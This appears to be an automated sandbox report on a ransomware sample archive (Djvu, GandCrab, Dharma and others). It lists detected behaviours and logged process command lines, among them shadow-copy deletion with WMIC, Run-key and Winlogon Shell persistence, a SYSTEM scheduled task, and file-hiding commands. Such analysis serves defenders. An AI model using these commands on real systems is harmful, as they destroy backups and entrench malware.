Analysis Overview
SHA256
e876044c37cc3f095ae06e90abf8c4acf3f51e8073e07f8db8d7759d5979830b
Threat Level: Known bad
The file RNSM00467.7z was found to be: Known bad.
Malicious Activity Summary
Djvu Ransomware
Conti Ransomware
Gandcrab
GandCrab payload
Remcos
Detected Djvu ransomware
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Identifies Wine through registry keys
Checks BIOS information in registry
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Modifies file permissions
Obfuscated with Agile.Net obfuscator
Adds Run key to start application
Uses Tor communications
Looks up external IP address via web service
UPX packed file
Hide Artifacts: Hidden Files and Directories
Detects Pyinstaller
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-02 18:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-02 18:14
Reported
2024-10-02 18:17
Platform
win10v2004-20240802-en
Max time kernel
82s
Max time network
142s
Command Line
Signatures
Conti Ransomware
Detected Djvu ransomware
Djvu Ransomware
GandCrab payload
Gandcrab
Remcos
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\smss.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Obfuscated with Agile.Net obfuscator
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rundll32.exe" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\virus = "C:\\Users\\Admin\\Desktop\\00467\\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Uses Tor communications
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
UPX packed file
Detects Pyinstaller
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00467.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00467.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00467\hgfjgbnvbnfyvhjfcghbnftydeghdfhf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
C:\Users\Admin\Desktop\00467\Setup.exe
"C:\Users\Admin\Desktop\00467\Setup.exe"
C:\Users\Admin\Desktop\00467\smss.exe
"C:\Users\Admin\Desktop\00467\smss.exe"
C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp" /SL5="$40446,6160288,227840,C:\Users\Admin\Desktop\00467\Setup.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "exploreresi" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\exploreresi.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9142005D-2F1F-4DB8-8F0E-237525AC258B}'" delete
C:\Users\Admin\AppData\Local\Temp\rundll32.exe
"C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe
HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9af680c45a7f146176d9ea94ef7589544ef33ed88b78d4d0eec62e6b4ad55259.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9af680c45a7f146176d9ea94ef7589544ef33ed88b78d4d0eec62e6b4ad55259.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-c79a2a45c5ed7e884911533a5be8fe17be60210705fd3925c1007fd12edfee10.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.pef-c79a2a45c5ed7e884911533a5be8fe17be60210705fd3925c1007fd12edfee10.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Generic-12fe1a5cfbef5b40d33d1586096588188e2f88c30eb7e75ccea7b88b87f85462.exe
HEUR-Trojan-Ransom.Win32.Generic-12fe1a5cfbef5b40d33d1586096588188e2f88c30eb7e75ccea7b88b87f85462.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe
HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9.exe
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-aacbdfb0876945145eaed48ba7d407002931233f7fd2ed29d8d82c4acc15d50d.exe
HEUR-Trojan.MSIL.Crypt.gen-aacbdfb0876945145eaed48ba7d407002931233f7fd2ed29d8d82c4acc15d50d.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-b101bb78780fc065872cce7a311d65e3361d9c6b9c1191ef2b45535bf4bc71f1.exe
HEUR-Trojan.MSIL.Crypt.gen-b101bb78780fc065872cce7a311d65e3361d9c6b9c1191ef2b45535bf4bc71f1.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-bda16ef37fa055ac934e131acb824a54850d0a63cb2c56e24e7f9073336cdd43.exe
HEUR-Trojan.MSIL.Crypt.gen-bda16ef37fa055ac934e131acb824a54850d0a63cb2c56e24e7f9073336cdd43.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb.exe
HEUR-Trojan.MSIL.Crypt.gen-cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-d992f05972629a2764cd1b57abfb88c714647a86af9a017a9211b85e56a0c3e2.exe
HEUR-Trojan.MSIL.Crypt.gen-d992f05972629a2764cd1b57abfb88c714647a86af9a017a9211b85e56a0c3e2.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "exploreresi" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\exploreresi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6256 -ip 6256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6048 -ip 6048
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
.
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Users\Admin
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\ProgramData
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Program Files (x86)
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
C:\Users\Admin\AppData\Roaming
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
\\DADDYSERVER
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 236
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9142005D-2F1F-4DB8-8F0E-237525AC258B}'" delete
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 480
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-deb8b966472fc6965603cf2f0b518bf46ae0b57a871afe96f4555541b42ea7d2.exe
HEUR-Trojan.MSIL.Crypt.gen-deb8b966472fc6965603cf2f0b518bf46ae0b57a871afe96f4555541b42ea7d2.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7860 -ip 7860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 456 -ip 456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6916 -ip 6916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6840 -ip 6840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6848 -ip 6848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6792 -ip 6792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7116 -ip 7116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 300
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\AppData\Local\Temp\system.exe
"C:\Users\Admin\AppData\Local\Temp\system.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\07baf339-4cae-4dfc-a0cc-c3016531c157" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Agent.aumz-01fa1ed69196ed40a66dbf458eaa6bdf983263175101c505eae366b85727e26e.exe
Trojan-Ransom.Win32.Agent.aumz-01fa1ed69196ed40a66dbf458eaa6bdf983263175101c505eae366b85727e26e.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Blocker.kpuo-cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954.exe
Trojan-Ransom.Win32.Blocker.kpuo-cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Cryptodef.adbh-14259c6645fadc816ba82c52c050f1b58b5507ba292985ee29931341700ac55c.exe
Trojan-Ransom.Win32.Cryptodef.adbh-14259c6645fadc816ba82c52c050f1b58b5507ba292985ee29931341700ac55c.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Cryptodef.aoo-1dece757fb0cdc99d5caa035d41970e2a32ac4c0b03c94f3c029b2fd85d90b7f.exe
Trojan-Ransom.Win32.Cryptodef.aoo-1dece757fb0cdc99d5caa035d41970e2a32ac4c0b03c94f3c029b2fd85d90b7f.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Digitala.do-7424ec4f70d0c951ad4d4621926aa964fec54031f79aa2c83139dae17c2f3239.exe
